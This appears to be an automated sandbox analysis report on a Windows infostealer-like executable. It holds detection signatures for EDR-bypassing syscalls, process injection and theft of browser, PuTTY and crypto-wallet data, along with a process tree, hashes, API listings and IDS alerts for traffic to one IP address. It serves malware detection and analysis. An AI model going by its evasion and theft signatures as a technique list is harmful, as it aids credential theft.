
Windows Analysis Report
kXzODlqJak.exe

Overview

General Information

Sample name: kXzODlqJak.exe (renamed because the original name is a hash value)
Original sample name: 3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075.exe
Analysis ID: 1586711
MD5: ab79eafcce0d6eff856b259977e480e1
SHA1: 736603a24e9b143a644c1fe3673c7ac7fbeee37c
SHA256: 3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075
Tags: exe, user-crep1x

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • kXzODlqJak.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\kXzODlqJak.exe" MD5: AB79EAFCCE0D6EFF856B259977E480E1)
    • kXzODlqJak.exe (PID: 7776 cmdline: "C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652 MD5: 2C6652F7E01283DE091B5200B7878E69)
      • RescueCDBurner.exe (PID: 7828 cmdline: C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
        • RescueCDBurner.exe (PID: 7848 cmdline: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
          • cmd.exe (PID: 7872 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 6224 cmdline: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 2044 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 6204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2180,i,768463352532878709,16600556330849448278,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • RescueCDBurner.exe (PID: 3492 cmdline: "C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • cmd.exe (PID: 1660 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 3824 cmdline: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 7580 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7832 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2904 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5972 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7096 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5344 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5304 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6504 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7120 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7872, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, ProcessId: 6224, ProcessName: LocalCtrl_alpha_v3.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-09T14:42:21.593732+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49973 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:22.982174+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49974 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:23.774733+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49975 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:40.385432+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50061 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:41.480461+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50065 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:56.274932+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50084 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:57.838141+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50085 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:58.805925+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50086 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:59.719074+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50087 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:00.973940+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50088 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:02.883336+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50089 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:04.240842+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50090 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:09.026281+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50091 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:10.054240+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50092 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:10.982316+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50093 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:11.774366+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50094 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:12.607238+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50095 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:13.524132+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50096 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:14.504321+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50097 | 104.21.80.52 | 443 | TCP

AV Detection

Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | ReversingLabs: Detection: 28%
Source: kXzODlqJak.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0092ED3B DecryptFileW,1_2_0092ED3B
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0096A2D0 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,1_2_0096A2D0
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0092DA0E CreateFileW,GetLastError,DecryptFileW,CloseHandle,1_2_0092DA0E
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0092EA4B DecryptFileW,1_2_0092EA4B
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0092DB8F CreateFileW,GetLastError,DecryptFileW,CloseHandle,1_2_0092DB8F
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0092ECE9 DecryptFileW,1_2_0092ECE9
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0017ED3B DecryptFileW,2_2_0017ED3B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001BA2D0 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,2_2_001BA2D0
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0017DA0E CreateFileW,GetLastError,DecryptFileW,CloseHandle,2_2_0017DA0E
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0017EA4B DecryptFileW,2_2_0017EA4B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0017DB8F CreateFileW,GetLastError,DecryptFileW,CloseHandle,2_2_0017DB8F
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0017ECE9 DecryptFileW,2_2_0017ECE9
Source: RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_13c618d5-8
Source: kXzODlqJak.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File opened: C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:49973 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:49975 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50061 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50065 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50084 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50085 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50086 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50087 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50088 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50089 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50090 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50091 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50092 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50093 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50094 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50095 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50096 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50097 version: TLS 1.2
Source: kXzODlqJak.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0@ source: RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1513682078.000000006C621000.00000020.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000004.00000002.1575451197.000000006D4E1000.00000020.00000001.01000000.00000017.sdmp, RescueCDBurner.exe, 00000008.00000002.1845851673.000000006D6B1000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000003.00000002.1513883518.000000006C6E1000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000004.00000002.1575775399.000000006D5A1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb source: kXzODlqJak.exe, 00000001.00000000.1458362168.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000000.1464490420.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000002.1484896515.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb 0Jm source: kXzODlqJak.exe, 00000002.00000002.1486043148.000000006D491000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1513161996.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1513361909.0000000009F50000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572080726.000000000A9F0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1567761052.000000000342E000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572388231.000000000ADAB000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1878041034.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877347727.0000000004697000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843959169.0000000009DBF000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1844261418.000000000A4C1000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1513161996.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1513361909.0000000009F50000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572080726.000000000A9F0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1567761052.000000000342E000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572388231.000000000ADAB000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1878041034.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877347727.0000000004697000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843959169.0000000009DBF000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1844261418.000000000A4C1000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb> source: kXzODlqJak.exe, 00000001.00000000.1458362168.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000000.1464490420.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000002.1484896515.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb source: kXzODlqJak.exe, 00000002.00000002.1486043148.000000006D491000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1516266410.000000006D381000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1576546170.000000006D7F1000.00000020.00000001.01000000.00000011.sdmp, RescueCDBurner.exe, 00000008.00000002.1846420137.00000000700A1000.00000020.00000001.01000000.00000011.sdmp
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_00915C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00915C81
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_00961290 FindFirstFileExW,1_2_00961290
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0097343B FindFirstFileW,FindClose,1_2_0097343B
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0092E72A FindFirstFileW,FindNextFileW,FindClose,1_2_0092E72A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001B1290 FindFirstFileExW,2_2_001B1290
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001C343B FindFirstFileW,FindClose,2_2_001C343B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0017E72A FindFirstFileW,FindNextFileW,FindClose,2_2_0017E72A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_00165C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_00165C81
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D470D44 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,wsprintfW,FindNextFileW,FindClose,2_2_6D470D44
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D470534 _memset,FindFirstFileW,FindClose,2_2_6D470534
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D44B005 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,wsprintfW,GetTickCount,wsprintfW,FindNextFileW,FindClose,2_2_6D44B005
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D4472FA __EH_prolog3_GS,GetACP,GetACP,GetACP,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,2_2_6D4472FA
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C67CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6C67CC23
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C67C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6C67C8FD
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C6481A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6C6481A1
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 4x nop then or byte ptr [edi], dh 3_2_6C637270
Source: Joe Sandbox View | IP Address: 162.159.61.3
Source: Joe Sandbox View | IP Address: 40.79.167.8
Source: Joe Sandbox View | IP Address: 20.110.205.119
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49975 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49973 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49974 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50061 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50065 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50084 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50086 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50085 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50088 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50087 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50090 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50094 -> 104.21.80.52:443
